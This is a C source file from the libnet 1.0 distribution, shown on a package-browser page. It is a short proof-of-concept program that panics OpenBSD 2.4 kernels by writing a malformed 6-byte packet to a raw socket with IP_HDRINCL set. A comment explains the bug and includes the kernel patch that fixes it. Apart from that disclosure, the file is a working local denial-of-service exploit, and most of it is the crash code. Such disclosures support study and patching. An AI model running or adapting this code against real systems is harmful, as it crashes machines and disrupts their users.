File: hook.c

package info (click to toggle)
libnet 1.0-1
  • links: PTS
  • area: main
  • in suites: potato
  • size: 1,792 kB
  • ctags: 853
  • sloc: ansic: 8,738; sh: 1,793; makefile: 407
file content (90 lines) | stat: -rw-r--r-- 2,421 bytes parent folder | download 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
 
/*
 *  $Id: hook.c,v 1.2 1999/10/27 01:37:28 route Exp $
 *
 *  hook.c
 *  Panics OpenBSD 2.4 kernels.
 *
 *  Well whut doya know?  Here I am working on libnet when I come up with this.
 *  Localhost OpenBSD kernel panic.  No security issue.  Just a kernel bug.
 *
 *  Opening a raw IP socket and setting IP_HDRINCL and then NOT including an
 *  IP header causes problems.  The code below with the `magic` numbers will
 *  cause an immediate kernel panic.  Other data may cause kernel
 *  instability leading to an eventual panic or crash.
 *
 *  Needs libnet (http://www.packetfactory.net).
 *
 *  (c) 1998 route|daemon9 <route@infonexus.com>
 */

/*

--- raw_ip.c.old        Fri Dec 11 16:48:26 1998
+++ raw_ip.c    Fri Dec 11 16:46:59 1998
@@ -200,11 +200,13 @@
                 * don't allow both user specified and setsockopt options,
                 * and don't allow packet length sizes that will crash
                 */
-               if ((ip->ip_hl != (sizeof (*ip) >> 2) && inp->inp_options) ||
-                   ip->ip_len > m->m_pkthdr.len) {
-                       m_freem(m);
-                       return (EINVAL);
-               }
+                if ((ip->ip_hl != (sizeof (*ip) >> 2) && inp->inp_options)
+                    || (ip->ip_len > m->m_pkthdr.len)
+                    || (ip->ip_len < ip->ip_hl << 2)) {
+                        m_freem(m);
+                        return EINVAL;
+                }
+
                if (ip->ip_id == 0)
                        ip->ip_id = htons(ip_id++);
                /* XXX prevent ip_output from overwriting header fields */
*/
#include <libnet.h>

#define BUFSIZE 6

int
main(int argc, char **argv)
{
    int sock;
    u_char *buf, *p;

    fprintf(stderr, "PUSH THE PANIC BUTTON!\n");

    buf = (u_char *)malloc(BUFSIZE);
    if (!buf)
    {
        perror("No memory for packet header");
        exit(EXIT_FAILURE);
    }

    /*
     *  Open a IPPROTO_RAW socket and set IP_HDRINCL.
     */
    sock = libnet_open_raw_sock(IPPROTO_RAW);
    if (sock == -1)
    {
        perror("No socket");
        exit(EXIT_FAILURE);
    }

    p = buf;

    *((u_char *)p) = 8;
    p += 1;
    *((u_char *)p) = 0;
    p += 2;
    *((u_short *)p) = htons(242);
    p += 2;
    *((u_short *)p) = htons(1);

    libnet_write_ip(sock, buf, BUFSIZE);
    printf("Didn't die.  Try again maybe.\n");
    free(buf);

    return (EXIT_SUCCESS);
}

/* EOF */